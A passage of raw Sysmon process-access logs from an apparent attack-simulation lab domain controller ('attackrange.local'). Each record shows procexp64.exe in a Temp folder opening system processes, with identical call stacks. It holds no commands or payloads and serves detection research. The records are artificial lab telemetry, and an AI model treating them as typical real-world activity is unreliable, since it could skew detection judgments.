(x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 